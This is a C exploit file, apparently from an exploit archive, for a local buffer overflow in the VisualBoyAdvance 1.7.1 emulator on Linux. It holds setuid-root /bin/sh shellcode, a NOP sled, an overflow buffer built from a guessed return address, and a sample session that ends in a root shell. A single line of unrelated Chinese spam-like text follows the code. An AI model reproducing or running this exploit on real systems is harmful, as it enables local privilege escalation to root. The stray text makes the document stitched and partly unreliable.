/* VisualBoyAdvanced 1.x.x local Shell Exploit by Qnix (q-nix[at]hotmail.com) Example : [root@Qnix exp]# ls V* exp*c ret*c ret exp exp ret.c VisualBoyAdvance.cfg exp.c VisualBoyAdvance ret VisualBoyAdvance-1.7.1-SDL-linux-glibc22.tar.gz [root@Qnix exp]# ./exp Segmentation fault [root@Qnix exp]# ./ret -1073745328 [root@Qnix exp]# ./exp -1073745328 VisualBoyAdvance-SDL version 1.7.1 Linux version Seaching for file VisualBoyAdvance.cfg Searching current dir: /root/tools/exp Reading configuration file. sh-3.00# :) exp.c **/ char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" "\x68"; int main(int argc,char *argv[]) { char buffer[2300]; int i,x; long *ptr = (long *) buffer; for(i=0 ; i < 570 ; i++) *(ptr + i) = atoi(argv[1]); for(i=0 ; i < 1900 ; i++) buffer[i] = '\x90'; for(x=0 ; x < strlen(shellcode) ; x++ ) buffer[i++] = shellcode[x]; execl("./VisualBoyAdvance","VisualBoyAdvance",buffer,0); return 0; } /* ret.c #include int main(void) { int i; printf("%d\n",0xbffff250); return 0; } */

亚洲欧美在线